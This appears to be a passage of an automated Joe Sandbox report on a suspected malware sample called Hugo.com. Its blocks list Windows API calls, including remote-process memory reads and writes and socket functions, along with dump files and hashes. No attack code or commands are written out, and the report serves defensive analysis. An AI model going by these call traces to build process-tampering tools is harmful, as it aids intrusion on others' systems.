                                                                                                                                                                                                                • Part of subcall function 00F7BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F72B1D,?,?,00000034,00000800,?,00000034), ref: 00F7BDF4
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F730AD
                                                                                                                                                                                                                • Part of subcall function 00F7BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F72B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00F7BDBF
                                                                                                                                                                                                                • Part of subcall function 00F7BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00F7BD1C
                                                                                                                                                                                                                • Part of subcall function 00F7BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F72AE1,00000034,?,?,00001004,00000000,00000000), ref: 00F7BD2C
                                                                                                                                                                                                                • Part of subcall function 00F7BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F72AE1,00000034,?,?,00001004,00000000,00000000), ref: 00F7BD42
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F7311A
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F73167
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                              • API String ID: 4150878124-2766056989
                                                                                                                                                                                                              • Opcode ID: aef215e1aa3ef6443e4a8f2a02273269851845ba1779f499553db6e17da48c21
                                                                                                                                                                                                              • Instruction ID: 48c77020b7bfbdf469512377f590b26b1e36a34f80dae5d5b7c3e3c88ab6743f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aef215e1aa3ef6443e4a8f2a02273269851845ba1779f499553db6e17da48c21
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2412D72D00218BEDB11DBA4CD45BDEB7B8EF46710F008096F959B7180DA746F85EB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com,00000104), ref: 00F41AD9
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F41BA4
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F41BAE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com
                                                                                                                                                                                                              • API String ID: 2506810119-4254922787
                                                                                                                                                                                                              • Opcode ID: e858dadb1bf38fbdc50d8ac1dc295831447db59ac0c5a1ed482b45e08bf7788a
                                                                                                                                                                                                              • Instruction ID: 6c25de1b613de0e83e36ad5f3d7727b4ddafa4ca7b69af58375398daffb95260
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e858dadb1bf38fbdc50d8ac1dc295831447db59ac0c5a1ed482b45e08bf7788a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4316F71E00258ABDB21DF99DC85D9EBFFCFB85720B1041A6FD049B221E6744E80EB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F7CBB1
                                                                                                                                                                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00F7CBF7
                                                                                                                                                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FE29C0,01764908), ref: 00F7CC40
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 135850232-4108050209
                                                                                                                                                                                                              • Opcode ID: dc9f71cc9f86b61e5d455f7a6beccfdf14e71b5ae2e7c72aa9bdf11c0e04aee5
                                                                                                                                                                                                              • Instruction ID: 67242856179f2654cf328926f8f031318b7bc5e49f8163cdbfdc1fcae2e96c60
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc9f71cc9f86b61e5d455f7a6beccfdf14e71b5ae2e7c72aa9bdf11c0e04aee5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5641E1716043429FD725DF24DC85F5ABBE8AF85720F04861EF4A997291CB34E904DB93
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00FADCD0,00000000,?,?,?,?), ref: 00FA4F48
                                                                                                                                                                                                              • GetWindowLongW.USER32 ref: 00FA4F65
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FA4F75
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Long
                                                                                                                                                                                                              • String ID: SysTreeView32
                                                                                                                                                                                                              • API String ID: 847901565-1698111956
                                                                                                                                                                                                              • Opcode ID: b3b0ddcc83dc0edd08d7d91695859a8d7dbd5f8a5ab72bf8ac72e1421e7d09af
                                                                                                                                                                                                              • Instruction ID: 1416902ab1a81d792ea798115008a0315353073b4f9c5dee55a998dcd8e05ce6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3b0ddcc83dc0edd08d7d91695859a8d7dbd5f8a5ab72bf8ac72e1421e7d09af
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E31B0B1610209AFDB208F38CC45BEA77A9EB4A374F204715F979A31E0D7B4EC50AB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F93DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00F93AD4,?,?), ref: 00F93DD5
                                                                                                                                                                                                              • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F93AD7
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F93AF8
                                                                                                                                                                                                              • htons.WSOCK32(00000000,?,?,00000000), ref: 00F93B63
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                              • String ID: 255.255.255.255
                                                                                                                                                                                                              • API String ID: 946324512-2422070025
                                                                                                                                                                                                              • Opcode ID: 83a0291e2bc5f3687cb7ff5f94ccfc56337d827637f0d0d217636ca25bbeacd4
                                                                                                                                                                                                              • Instruction ID: 9879de76f1be170f782ddfc2d8b0c8f29cff89615fbcf0f3f186a02104cdf238
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83a0291e2bc5f3687cb7ff5f94ccfc56337d827637f0d0d217636ca25bbeacd4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA31D535600201DFEF10CF28C485E6977F1EF95328F258159E8168B7A2D735EE41E760
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00FA49DC
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00FA49F0
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00FA4A14
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Window
                                                                                                                                                                                                              • String ID: SysMonthCal32
                                                                                                                                                                                                              • API String ID: 2326795674-1439706946
                                                                                                                                                                                                              • Opcode ID: a099484b6382abe79c418f0fdd414ef4e573baec2fdeeebdb68dadbc20ee5572
                                                                                                                                                                                                              • Instruction ID: 3b26b8cad92006f0518ac960edee8871be5f8aec724613a51e28ecebcc4d139f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a099484b6382abe79c418f0fdd414ef4e573baec2fdeeebdb68dadbc20ee5572
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F21BF72640219ABDF118F90CC42FEB3B79EF89724F110214FA156B1D0D6B5B851ABA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00FA51A3
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00FA51B1
                                                                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FA51B8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                              • String ID: msctls_updown32
                                                                                                                                                                                                              • API String ID: 4014797782-2298589950
                                                                                                                                                                                                              • Opcode ID: 36512395acc872569163343a65d9dca239dfa9bda3fa35f92ef763100f9386c2
                                                                                                                                                                                                              • Instruction ID: 8a8ce0e361843236856ca96c40532401ea7fb712a3cbd3905822e7be6fd0de6f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36512395acc872569163343a65d9dca239dfa9bda3fa35f92ef763100f9386c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E92190F5600649AFDB00DF24CCC1EBB37ADEB5A7A4B040059F9009B361CB74EC01EAA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00FA42DC
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00FA42EC
                                                                                                                                                                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00FA4312
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                              • String ID: Listbox
                                                                                                                                                                                                              • API String ID: 3315199576-2633736733
                                                                                                                                                                                                              • Opcode ID: f7cdda346711fdd7de1cc31cd39172d7956f260f8bab5f365ba8a4c633b8c7ce
                                                                                                                                                                                                              • Instruction ID: f362f1dd1fa2f101103149fb13d2dbd4409e5953ee51fe1d69cf5e863a214a80
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7cdda346711fdd7de1cc31cd39172d7956f260f8bab5f365ba8a4c633b8c7ce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA219572A10218BBDF118F94CC85FAB37AEEFCA764F118114F9059B190C6B1AC52A7A0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00F8544D
                                                                                                                                                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F854A1
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,00FADCD0), ref: 00F85515
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                              • String ID: %lu
                                                                                                                                                                                                              • API String ID: 2507767853-685833217
                                                                                                                                                                                                              • Opcode ID: afb0f706c83c042936d5933a816a6c487a670574f0303e936131f251c67aab3d
                                                                                                                                                                                                              • Instruction ID: 80d42d93dfd6f1901080952ba305b16e90451027f917a20ea636e93b9bbe2f38
                                                                                                                                                                                                              • Opcode Fuzzy Hash: afb0f706c83c042936d5933a816a6c487a670574f0303e936131f251c67aab3d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E317374A00109AFDB10EF54C885EAA7BF8EF05318F1440A5F409DB262DB75EE45EB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00FA4CED
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00FA4D02
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00FA4D0F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                              • String ID: msctls_trackbar32
                                                                                                                                                                                                              • API String ID: 3850602802-1010561917
                                                                                                                                                                                                              • Opcode ID: 1da440dec5b700ee530cbe27b1d47375b04a0876bd3343570b59d0ee13badbcd
                                                                                                                                                                                                              • Instruction ID: dc144f4b89988f928442b00fa46aa0d33501b7c6138fefb8f9675b44d975bb84
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1da440dec5b700ee530cbe27b1d47375b04a0876bd3343570b59d0ee13badbcd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76110AB1640248BEEF115F65CC06FEB3BACEFC6764F110515FA55D60A0D6B1EC51AB10
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F18577: _wcslen.LIBCMT ref: 00F1858A
                                                                                                                                                                                                                • Part of subcall function 00F736F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F73712
                                                                                                                                                                                                                • Part of subcall function 00F736F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F73723
                                                                                                                                                                                                                • Part of subcall function 00F736F4: GetCurrentThreadId.KERNEL32 ref: 00F7372A
                                                                                                                                                                                                                • Part of subcall function 00F736F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F73731
                                                                                                                                                                                                              • GetFocus.USER32 ref: 00F738C4
                                                                                                                                                                                                                • Part of subcall function 00F7373B: GetParent.USER32(00000000), ref: 00F73746
                                                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00F7390F
                                                                                                                                                                                                              • EnumChildWindows.USER32(?,00F73987), ref: 00F73937
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                              • String ID: %s%d
                                                                                                                                                                                                              • API String ID: 1272988791-1110647743
                                                                                                                                                                                                              • Opcode ID: 70858fcab852a8bafe977cd0087c7a80cae585b6b7b28a10e1aaa9dcadad4635
                                                                                                                                                                                                              • Instruction ID: 5c0dde7bf245fb1dc7d6fc97433e996c8020812c06ca997fb10501b8cbdd061b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70858fcab852a8bafe977cd0087c7a80cae585b6b7b28a10e1aaa9dcadad4635
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC11D5B16002097BCF01BF749C85EED777A9F94354F048066B90D9B292CE749946BB21
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00FA6360
                                                                                                                                                                                                              • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00FA638D
                                                                                                                                                                                                              • DrawMenuBar.USER32(?), ref: 00FA639C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 3227129158-4108050209
                                                                                                                                                                                                              • Opcode ID: 24bcd4574e0e93e6183d209e3d33d28936a3e1b9319a22089b2455393e42b82a
                                                                                                                                                                                                              • Instruction ID: fb0d5bf055184df6e290e2fa6ecf016a53f59348b34c79495fef4c9cfa4cc25a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24bcd4574e0e93e6183d209e3d33d28936a3e1b9319a22089b2455393e42b82a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 380161B2910218AFDF119F11DC84FAE7BB4FB46761F188099E84AD6150DF308985FF21
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00F6E797
                                                                                                                                                                                                              • FreeLibrary.KERNEL32 ref: 00F6E7BD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                              • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                              • API String ID: 3013587201-2590602151
                                                                                                                                                                                                              • Opcode ID: 31f830245e4cd8963230f4de9fb2208cd627b21d81e6c3e479d02c8aea7b7187
                                                                                                                                                                                                              • Instruction ID: 916e4ef6a3773d17bc098a9b49772812de9e39ef0b19eb54a870074e08544981
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31f830245e4cd8963230f4de9fb2208cd627b21d81e6c3e479d02c8aea7b7187
